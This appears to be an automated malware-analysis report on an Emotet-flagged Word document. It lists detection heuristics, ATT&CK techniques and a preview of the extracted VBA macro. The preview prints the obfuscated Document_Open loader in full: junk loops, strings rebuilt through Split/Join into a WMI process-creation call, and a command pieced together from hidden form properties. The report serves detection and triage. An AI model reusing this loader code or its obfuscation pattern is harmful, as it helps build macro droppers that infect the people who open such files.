MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains a VBA macro with a hidden UserForm and obfuscated code, a common technique for Emotet. Heuristics indicate a command stager is present, designed to execute code and likely download a secondary payload. The ClamAV signature also explicitly identifies it as Emotet.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-7458423-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7458423-1
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
Ggqigemz = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Kyrevpin.Qjniafsohtzkw + "rocess" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Hcdtgxkcthnf = CreateObject(Cgsuqbgrdsd) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Gppbksbstrkuz = GetObject(INSN & Ggqigemz) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8109 bytes |
SHA-256: e13371cb7926e0cce954e6257119a1bdb1c8a38254c6235468f7edc93492b3e3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
201 of 308 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Kyrevpin"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Qjniafsohtzkw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Gpjxzqvhp
Dim Fbppzklof
For Jbqaevsyqnuod = Jqhopfvk To 0
Yfoouubdlcld = xPI
Ustzgfigymaor = CDbl(3)
Lnmbhmgzrmf = Tan(MyeW5A)
Exsrtcwvaowij = 4 - Bngdbmzpz
Joscmbxkcbuj = (3 - Dwlyptxuzyd)
Glfispbs = Xcvkzpfh
Oxqorkivop = CDbl(6)
Fzryxtbttwwto = Tan(Ixftqzvnivqq)
Next
Dim Khrcephzhfyg
Dim Mqfybxwryui
For Xcvhxjkoe = Jqhopfvk To 0
Tvcnqzcrc = xPI
Afcvqxsjwu = CDbl(3)
Jxlyaxychy = Tan(MyeW5A)
Fuibysrlm = 4 - Pfcsnvvv
Ltqebbte = (3 - Cgwpvork)
Exvwvtxe = Mclctaswx
Hvkzjimwydksk = CDbl(6)
Xtiieotjpzv = Tan(Uwummewblxmkk)
Next
Dim Ecafkuwwyx
Dim Awmjkyoabvneh
For Linexvvf = Jqhopfvk To 0
Zkhuucvq = xPI
Lsyavjyi = CDbl(3)
Wxsulnltede = Tan(MyeW5A)
Fkohfhssnoqpt = 4 - Inxnvbhcrmi
Cmpwtwsqhct = (3 - Xijbesdykqg)
Uyiwuwabpbzuv = Xblelfeytqhq
Rvjfxcuhkhwa = CDbl(6)
Hjhjwlbjf = Tan(Qpzogmgxi)
Next
Hcdtgxkcthnf
End Sub
Attribute VB_Name = "Jsbkraxy"
Attribute VB_Base = "0{830EAA7A-1B71-4277-B4AB-3EF880367575}{DD105773-569D-4B16-B191-C6B4AFEA6D1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Lguhsipfaag"
Function Ajueafukppsix()
Dim Dwqunlcvs
Dim Fqclqftqect
For Yyvkiorife = Jqhopfvk To 0
Ttbepqzuql = xPI
Tqosxcdkvf = CDbl(3)
Qrmesgampzw = Tan(MyeW5A)
Mplthtnylqsz = 4 - Cacqnxmnxd
Jlnuuucb = (3 - Sqomiqfaueu)
Lmiioeyrhyfjc = Wxwxaoimcbp
Xjqhonbhll = CDbl(6)
Nvlsicfeoewhw = Tan(Daggyipuyi)
Next
Glvgiorl = Kyrevpin.Qjniafsohtzkw
Dim Rbrxawdabkv
Dim Iemdgitxw
For Ovufakqa = Jqhopfvk To 0
Uzpkrrlriaonn = xPI
Oycgqqvgni = CDbl(3)
Xzruumjn = Tan(MyeW5A)
Toqignvobhfvm = 4 - Ubfzsbbmpor
Ubebereop = (3 - Hlzhywbnfg)
Dnmurcbupw = Zcdrvgzetvsh
Nsmemztqansw = CDbl(6)
Nnulwehwtk = Tan(Gvqivfrxpihkk)
Next
Qcxkvwdlvty = Glvgiorl + Jsbkraxy.Kioicuxkupknt + Jsbkraxy.Ecclogdoh + Jsbkraxy.Gqemglefkb
Dim Yvalekapl
Dim Zaaslpipywaoo
For Vkuxvthytqz = Jqhopfvk To 0
Uuylprti = xPI
Dvudmjxh = CDbl(3)
Rpqvnkfsc = Tan(MyeW5A)
Lkgvexoy = 4 - Fujqcbqvpv
Ykeddyfmbft = (3 - Knhhljjpvmug)
Joxnmtymvq = Qskkzbmyrnin
Zxcykwynvx = CDbl(6)
Hdsyrrgqsqfl = Tan(Uguvfjjzubjx)
Next
Ovrexuwvzbhqc = Qcxkvwdlvty + Jsbkraxy.Zdvhlzvvtqot + Jsbkraxy.Dmgujvpeglnv
Dim Rrqrbdqma
Dim Vjuanewyu
For Lmxwhzacwkh = Jqhopfvk To 0
Koturumlcgitm = xPI
Zsaqcefdt = CDbl(3)
Rlyaxogwpzlch = Tan(MyeW5A)
Bigpduvucekr = 4 - Flzpudancitm
Hnqsqjcwxeb = (3 - Rvwnxfbkommn)
Ogxvqehmpnra = Inunshjrgvwh
Tbdfusoq = CDbl(6)
Lxnfgivwoj = Tan(Ryuoiwac)
Next
Ajueafukppsix = Muclacme + Ovrexuwvzbhqc + Muclacme
Dim Kffoulmvin
Dim Kpbtitdwkknt
For Pmmiryxnpi = Jqhopfvk To 0
Wqmtbddgft = xPI
Knblcarml = CDbl(3)
Aiawqvwztlvwn = Tan(MyeW5A)
Jkpvhvlhxdx = 4 - Pqvbptmlah
Ititpqoblq = (3 - Qabpbcssjlkcq)
Txfjcckyb = Imjkayizkos
Xoucxjgdvj = CDbl(6)
Fhftfbzm = Tan(Gjykltrjsaav)
Next
End Function
Function Hcdtgxkcthnf()
Dim Wbhknmln
Dim Slmggfpbmgz
For Wsuwgnagssq = Jqhopfvk To 0
Ucfsyhagobznl = xPI
Oaqetkksspf = CDbl(3)
Hatwtklnwt = Tan(MyeW5A)
Ckirvjuxkrsc = 4 - Ljjmcsgpynhd
Ebsghmqa = (3 - Xgkdapir)
Ybdjqplnlujsp = Jzmuaclhjpwh
Ifqttbcxips = CDbl(6)
Ohqerqlq = Tan(Xjwntuuuhixdo)
Next
Ggqigemz = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Kyrevpin.Qjniafsohtzkw + "rocess"
Dim Aefucgbnwqx
Dim Xxydeehlhfg
For Gsucpyhqhxvx = Jqhopfvk To 0
Juynlxgvvm = xPI
Vpeszzvjaist = CDbl(3)
Nypacgbryrjru = Tan(MyeW5A)
Kxiiudsmox = 4 - Umabemmj
Ujntdqmji = (3 - Wplklgvvmacg)
Fypfeired = Uazbzfpqgxwor
Rovgsciny = CDbl(6)
Edwdrljlqfvun = Tan(Qyiijylyrcj)
Next
Set Gppbksbstrkuz = GetObject(INSN & Ggqigemz)
Dim Pbsegjhkrgb
Dim Cijmikvjs
For Zbkptafu = Jqhopfvk To 0
Mhsuwzyckruj = xPI
Zrvnhhgwxqeey = CDbl(3)
Rbhtlqaqrlk = Tan(MyeW5A)
Imgpqnpbe = 4 - Unpkbpsbgmt
Qzgybdcxkzo = (3 - Onldomkuzx)
Pbtjqupwtzr = Abopjnayrae
Xggtrbfi = CDbl(6)
Jntfzpqp = Tan(Mnlvepja)
Next
Fixnlgod = Ggqigemz + Jsbkraxy.Gpqvirrnj.ControlTipText + Jsbkraxy.Dymsoqgugp.ControlTipText
Dim Kjvncqehrk
Dim Iveuhckcmyn
For Pcqxnmgvlddj = Jqhopfvk To 0
Gukinytb = xPI
Pcaqizlvr = CDbl(3)
Nnkexhsxsak = Tan(MyeW5A)
Dicpafanzmhlm = 4 - Mrisfqsgae
Bekeesbmaxw = (3 - Rzobctlrfk)
Sejlbblkoyjo = Skcmovng
Efykeywtjlm = CDbl(6)
Byvkkwspatza = Tan(Tvgfmqshwda)
Next
Cgsuqbgrdsd = Fixnlgod + Kyrevpin.Qjniafsohtzkw
Dim Msabphthqor
Dim Atdaqpuvodjk
For Ulvgipvpjxbpu = Jqhopfvk To 0
Zzcnevnav = xPI
Wvyoqqnkzvvh = CDbl(3)
Ykkfzavfnoeh = Tan(MyeW5A)
Bgkzvoszruhlc = 4 - Mersufkduvk
Ijkisojslvmu = (3 - Tqyoymoakmocs)
Qelqaqhj = Naxbifyugqmv
Ldiyxuqwsp = CDbl(6)
Adzjmgawlmq = Tan(Hqhmaqux)
Next
Set Hcdtgxkcthnf = CreateObject(Cgsuqbgrdsd)
Dim Plmhwuwn
Dim Csqbqyvan
For Mnazstuzzxskh = Jqhopfvk To 0
Jsxmtwfr = xPI
Dukmeotg = CDbl(3)
Ymiebboc = Tan(MyeW5A)
Hirppcdbvb = 4 - Avoykmuiyebg
Ktkshdjqvvcux = (3 - Slewcmmpdr)
Zldglnsrk = Ucmjzswp
Xgtxjzlxdhaf = CDbl(6)
Esorhfkabi = Tan(Qcmxgcnpbfjj)
Next
Hcdtgxkcthnf.XSize = False
Dim Nxfylkeoa
Dim Ibwmvphvlft
For Mrcikldpjzkdn = Jqhopfvk To 0
Nlzkjofevr = xPI
Xrnzufgltiveo = CDbl(3)
Ybmiiivh = Tan(MyeW5A)
Ihjhmgrmo = 4 - Vaqxgvsfpvwgn
Jipocjnu = (3 - Wegberaxccbvl)
Cckjmbwbkw = Adpifezjrlele
Kdbowoczhd = CDbl(6)
Wzcwevuztnuvq = Tan(Uqyzfqsmyiim)
Next
Hcdtgxkcthnf.YSize = False
Dim Pkmhalvhnlqkk
Dim Wdyzdawyxzwom
For Ffyaurpyw = Jqhopfvk To 0
Iftwregin = xPI
Qwwtlohewi = CDbl(3)
Gkmkaigeb = Tan(MyeW5A)
Srfbiriebrtpb = 4 - Garrmwpz
Eufagmkzxd = (3 - Nynodromv)
Ybgnjedcs = Exceufipdaz
Sexsxkaqtng = CDbl(6)
Yavubjnx = Tan(Lzxjdfhgybt)
Next
Do While Gppbksbstrkuz.Create(Null & Ajueafukppsix, Mxxglcgaujc, Hcdtgxkcthnf, Qsqixafbihdx)
Loop
Dim Xaynyyjdffvrt
Dim Jlczmqaj
For Guxnkgwugiuql = Jqhopfvk To 0
Yjxgihhspgc = xPI
Lhxrqosdmquzy = CDbl(3)
Mgtzyjohddz = Tan(MyeW5A)
Chgiaziyldzxl = 4 - Tchkkufjnc
Xaunrwtbejm = (3 - Oobdtcmwbnbwp)
Wytgslly = Iaslhkpikvg
Tzuqvmtrc = CDbl(6)
Egpffndpkok = Tan(Ltdlnemxtsag)
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.